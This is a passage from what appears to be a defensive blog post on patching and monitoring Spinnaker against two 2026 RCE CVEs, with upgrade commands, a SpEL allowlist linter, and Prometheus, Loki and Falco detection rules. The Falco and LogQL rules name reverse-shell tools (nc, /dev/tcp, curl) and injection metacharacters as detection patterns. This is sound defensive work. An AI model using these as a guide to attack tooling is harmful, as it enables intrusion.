  &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;svc&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;pod&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nb"&gt;cat&lt;/span&gt; /opt/spinnaker/config/spinnaker.yml | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A1&lt;/span&gt; &lt;span class="s1"&gt;'version:'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5.2 Helm Chart-Based Upgrade
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# OpsMx Spinnaker Helm chart (4.7.x supports 2026.1.0)&lt;/span&gt;
helm repo update opsmx
helm upgrade &lt;span class="nt"&gt;--install&lt;/span&gt; spinnaker opsmx/spinnaker &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; spinnaker &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 4.7.2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; &lt;span class="nv"&gt;spinnakerVersion&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2026.1.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; profiles.echo.pipelinetriggers.artifacts.enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; profiles.clouddriver.artifacts.gitrepo.enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--wait&lt;/span&gt; &lt;span class="nt"&gt;--timeout&lt;/span&gt; 20m

helm get values spinnaker &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s1"&gt;'spinnakerVersion|artifacts'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5.3 Halyard-Based Upgrade (Legacy)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run inside the Halyard container (Halyard is deprecated in 2026.x, but many sites still use it)&lt;/span&gt;
hal config version edit &lt;span class="nt"&gt;--version&lt;/span&gt; 2026.1.0
hal config features edit &lt;span class="nt"&gt;--artifacts&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;
&lt;span class="c"&gt;# Re-enable the gitrepo artifact type that the gitrepo workaround disabled&lt;/span&gt;
hal config artifact gitrepo &lt;span class="nb"&gt;enable&lt;/span&gt;
hal deploy apply
&lt;span class="c"&gt;# Afterwards, run hal deploy collect-logs and confirm there are no SpEL WARN lines&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. Post-Patch Regression Verification — Don't Block Legitimate SpEL
&lt;/h2&gt;

&lt;p&gt;The most common post-patch operational incident is &lt;strong&gt;legitimate SpEL expressions being rejected by the allowlist&lt;/strong&gt;. At ManoIT, three pipelines stopped right after patching, each matching one of the two blocked patterns in rows 1 and 2 below; rows 3 to 5 are common expressions that keep working:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Expression (worked pre-patch)&lt;/th&gt;
&lt;th&gt;Post-patch result&lt;/th&gt;
&lt;th&gt;Fix&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;${T(java.time.LocalDate).now()}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Blocked — &lt;code&gt;java.time.LocalDate&lt;/code&gt; not allowlisted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Use Spinnaker-provided &lt;code&gt;${execution.startTime}&lt;/code&gt; etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;${T(org.apache.commons.lang3.StringUtils).join(...)}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Blocked — Apache Commons not allowlisted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Use native Java String methods or Spinnaker helpers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Plain property reference &lt;code&gt;${parameters.version}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Works&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;List/map indexing &lt;code&gt;${trigger.artifacts[0].name}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Works&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Arithmetic &lt;code&gt;${parameters.replicas * 2}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Works&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
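&lt;p&gt;Both blocked rows share one shape: a &lt;code&gt;T(...)&lt;/code&gt; type reference to a class outside the allowlist. That makes it possible to screen pipeline JSON before the patch lands. The Bash sketch below is a rough heuristic, not Spinnaker's evaluator: it extracts every &lt;code&gt;T(fully.qualified.Class)&lt;/code&gt; reference and checks it against a local list. &lt;code&gt;ALLOWED_CLASSES&lt;/code&gt; and &lt;code&gt;check_spel_expr&lt;/code&gt; are hypothetical; the list is an illustrative assumption, not the allowlist shipped in the patch, so adjust it to what your patched release actually permits.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical pre-flight linter for SpEL type references of the form T(pkg.Class).
# ALLOWED_CLASSES is an illustrative assumption, NOT Spinnaker's real allowlist.
ALLOWED_CLASSES="java.lang.String java.lang.Math java.lang.Integer"

# check_spel_expr EXPR: prints "ok", or prints "blocked: CLASS" for the first
# class not in ALLOWED_CLASSES and returns 1.
check_spel_expr() {
  local expr="$1" cls
  # grep -o pulls out each T(a.b.C) reference; sed strips the T( ... ) wrapper
  for cls in $(printf '%s\n' "$expr" |
      grep -oE 'T\([A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z0-9_]+)+\)' |
      sed -E 's/^T\((.*)\)$/\1/'); do
    case " $ALLOWED_CLASSES " in
      *" $cls "*) ;;                        # allowlisted, keep scanning
      *) echo "blocked: $cls"; return 1 ;;
    esac
  done
  echo "ok"
}

# check_spel_expr '${T(java.time.LocalDate).now()}'   # prints: blocked: java.time.LocalDate
# check_spel_expr '${parameters.version}'             # prints: ok
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Expressions should be passed in single quotes so the shell does not expand &lt;code&gt;${...}&lt;/code&gt;. Because the check is purely textual, it can miss references built dynamically and should only be used to prioritize which pipelines to test by hand.&lt;/p&gt;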

&lt;p&gt;Three-step verification procedure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) For 1 week after the patch, harvest SpEL blocks from Echo logs&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker deploy/spin-echo &lt;span class="nt"&gt;--since&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;168h &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"SpelEvaluationException.*not whitelisted"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="s1"&gt;'{print $NF}'&lt;/span&gt; | &lt;span class="nb"&gt;sort&lt;/span&gt; | &lt;span class="nb"&gt;uniq&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; | &lt;span class="nb"&gt;sort&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt;

&lt;span class="c"&gt;# 2) Map blocks to pipelines: search each application's full pipeline JSON for the blocked class&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;app &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;spin application list &lt;span class="nt"&gt;--output&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.[].name'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;spin pipeline list &lt;span class="nt"&gt;--application&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$app&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; json &lt;span class="se"&gt;\&lt;/span&gt;
    | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;--arg&lt;/span&gt; blocked &lt;span class="s2"&gt;"java.time.LocalDate"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="s1"&gt;'.[] | select(tostring | contains($blocked)) | "\(.application)/\(.name)"'&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# 3) Bulk migration PR: teams that keep pipelines as code can list every affected file and fix them in one pass&lt;/span&gt;
rg &lt;span class="nt"&gt;-uu&lt;/span&gt; &lt;span class="nt"&gt;--json&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'T\(java\.time\.LocalDate\)\.now\(\)'&lt;/span&gt; pipelines/ &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'select(.type=="match") | .data.path.text'&lt;/span&gt; | &lt;span class="nb"&gt;sort&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Observability — Detecting Unpatched Instances and Exploit Attempts
&lt;/h2&gt;

&lt;p&gt;Just as important as the patch itself is detecting &lt;em&gt;instances that aren't patched&lt;/em&gt; and &lt;em&gt;actual exploit attempts&lt;/em&gt;. ManoIT monitors along three axes: Prometheus (metrics), Loki (logs), and Falco (runtime events).&lt;/p&gt;

&lt;h3&gt;
  
  
  7.1 Prometheus — Version Metric and Blocked SpEL Counter
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# prometheus/rules/spinnaker-cve-2026-32613-32604.yml&lt;/span&gt;
&lt;span class="na"&gt;groups&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker-cve-2026-32613-32604&lt;/span&gt;
  &lt;span class="na"&gt;rules&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# 1) Alert if Spinnaker version is below the patched lines&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;alert&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;SpinnakerVulnerableVersion&lt;/span&gt;
    &lt;span class="na"&gt;expr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;spinnaker_version_info{&lt;/span&gt;
        &lt;span class="s"&gt;version!~"^(2026\\.1\\.[0-9]+|2026\\.0\\.[1-9][0-9]*|2025\\.4\\.[2-9]|2025\\.3\\.[2-9])$"&lt;/span&gt;
      &lt;span class="s"&gt;} == 1&lt;/span&gt;
    &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;5m&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;critical&lt;/span&gt;
      &lt;span class="na"&gt;cve&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CVE-2026-32613,CVE-2026-32604"&lt;/span&gt;
    &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;summary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Spinnaker&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;{{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;$labels.instance&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;runs&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;vulnerable&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;version&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;{{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;$labels.version&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}"&lt;/span&gt;
      &lt;span class="na"&gt;runbook&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://runbooks.manoit.co.kr/spinnaker-cve-2026"&lt;/span&gt;

  &lt;span class="c1"&gt;# 2) Echo SpEL block counter rising (expected for a while after patching, as legitimate pipelines hit the new allowlist)&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;alert&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;EchoSpelBlockSpike&lt;/span&gt;
    &lt;span class="na"&gt;expr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;rate(echo_spel_evaluation_blocked_total[5m]) &amp;gt; 0.5&lt;/span&gt;
    &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10m&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;warning&lt;/span&gt;
    &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;summary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Echo&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;SpEL&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;allowlist&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;blocking&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;{{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;$value&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;expressions/sec&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;—&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;review&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;legitimate&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;pipelines"&lt;/span&gt;

  &lt;span class="c1"&gt;# 3) Clouddriver gitrepo invalid ref counter (signal of exploit attempt)&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;alert&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClouddriverGitrepoInvalidRef&lt;/span&gt;
    &lt;span class="na"&gt;expr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;rate(clouddriver_gitrepo_invalid_ref_total[5m]) &amp;gt; 0&lt;/span&gt;
    &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1m&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;critical&lt;/span&gt;
    &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;summary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Clouddriver&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;rejected&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;invalid&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;git&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;ref&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;—&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;possible&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;CVE-2026-32604&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;exploit&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;attempt"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
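&lt;p&gt;The version regex in the first rule is easy to get subtly wrong, so it is worth checking offline before the alert goes live. A minimal Bash sketch that reuses the same pattern with the YAML/PromQL double escaping removed (&lt;code&gt;\\.&lt;/code&gt; becomes &lt;code&gt;\.&lt;/code&gt;); &lt;code&gt;is_patched&lt;/code&gt; is a hypothetical helper and the sample versions are illustrative.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Same alternation as the SpinnakerVulnerableVersion rule. Prometheus anchors label
# regexes implicitly; the explicit ^...$ keeps Bash's =~ equally strict.
PATCHED_RE='^(2026\.1\.[0-9]+|2026\.0\.[1-9][0-9]*|2025\.4\.[2-9]|2025\.3\.[2-9])$'

# is_patched VERSION: exit status 0 if the alert would treat VERSION as patched
is_patched() {
  [[ "$1" =~ $PATCHED_RE ]]
}

for v in 2026.1.0 2026.0.1 2026.0.0 2025.4.2 2025.4.1 2025.4.10; do
  if is_patched "$v"; then
    echo "$v: patched"
  else
    echo "$v: alert fires"
  fi
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The last sample exposes a limitation: &lt;code&gt;2025\.4\.[2-9]&lt;/code&gt; matches a single digit, so a hypothetical 2025.4.10 would be reported as vulnerable. If that release line keeps receiving patches, an alternative such as &lt;code&gt;2025\.4\.([2-9]|[1-9][0-9]+)&lt;/code&gt; avoids the false positive.&lt;/p&gt;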



&lt;h3&gt;
  
  
  7.2 Loki — Search Echo/Clouddriver Logs for RCE Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# LogQL: blocked-class call attempts in Echo SpEL evaluation
# (__line__ prints the raw log line; fields such as .message exist only after a parser stage like | json)
{namespace="spinnaker", app="spin", cluster="spin-echo"}
  |~ "SpelEvaluationException"
  |~ "(java\\.lang\\.(Runtime|ProcessBuilder)|java\\.io\\.File|java\\.lang\\.reflect)"
  | line_format "{{.pod}} {{__line__}}"

# LogQL: Clouddriver gitrepo shell-metacharacter injection attempts
{namespace="spinnaker", app="spin", cluster="spin-clouddriver"}
  |~ "InvalidGitArtifactException"
  |~ "[;&amp;amp;|`$()]"

# LogQL: per-pod SpEL block counts over the week after the patch
sum by (pod) (
  count_over_time(
    {namespace="spinnaker", cluster="spin-echo"}
    |~ "SpelEvaluationException" [1w]
  )
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
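&lt;p&gt;When the look-back window exceeds Loki's retention, the filter from the first query can be replayed over exported log files instead. A minimal Bash sketch, assuming plain-text logs with each exception message on a single line (multi-line stack traces are not stitched together); the function name and file names are placeholders.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Replays the first LogQL filter over exported Echo logs read from stdin.
DANGEROUS_CLASS_RE='java\.lang\.(Runtime|ProcessBuilder)|java\.io\.File|java\.lang\.reflect'

# scan_echo_rce_indicators: print lines that are SpEL evaluation failures AND
# mention a class commonly used for command execution, file access, or reflection.
scan_echo_rce_indicators() {
  grep 'SpelEvaluationException' | grep -E "$DANGEROUS_CLASS_RE"
}

# Usage (file names are placeholders):
#   cat echo-*.log | scan_echo_rce_indicators
#   zcat echo-*.log.gz | scan_echo_rce_indicators | wc -l
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;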



&lt;h3&gt;
  
  
  7.3 Falco — Detect Suspicious Subprocess at the Container Runtime
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /etc/falco/rules.d/spinnaker-rce.yaml&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Spinnaker Echo unexpected subprocess&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Echo&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;container&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;should&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;not&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;spawn&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;shell&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;or&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;network&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;tools&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;(CVE-2026-32613&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;indicator)"&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container.image.repository contains "spinnaker/echo" and&lt;/span&gt;
    &lt;span class="s"&gt;(proc.name in (sh, bash, curl, wget, nc, ncat, python, perl, ruby) or&lt;/span&gt;
     &lt;span class="s"&gt;proc.cmdline contains "/dev/tcp/")&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Spinnaker Echo spawned suspicious process (user=%user.name command=%proc.cmdline&lt;/span&gt;
    &lt;span class="s"&gt;container_id=%container.id image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;spinnaker&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;cve-2026-32613&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;rce&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Spinnaker Clouddriver gitrepo unexpected child&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Clouddriver&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;gitrepo&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;downloader&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;should&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;only&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;spawn&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;'git'&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;binary&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;(CVE-2026-32604&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;indicator)"&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container.image.repository contains "spinnaker/clouddriver" and&lt;/span&gt;
    &lt;span class="s"&gt;proc.pname = "java" and&lt;/span&gt;
    &lt;span class="s"&gt;not proc.name in (git, git-remote-http, git-remote-https)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Spinnaker Clouddriver Java spawned non-git child process&lt;/span&gt;
    &lt;span class="s"&gt;(command=%proc.cmdline parent=%proc.pname container_id=%container.id)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
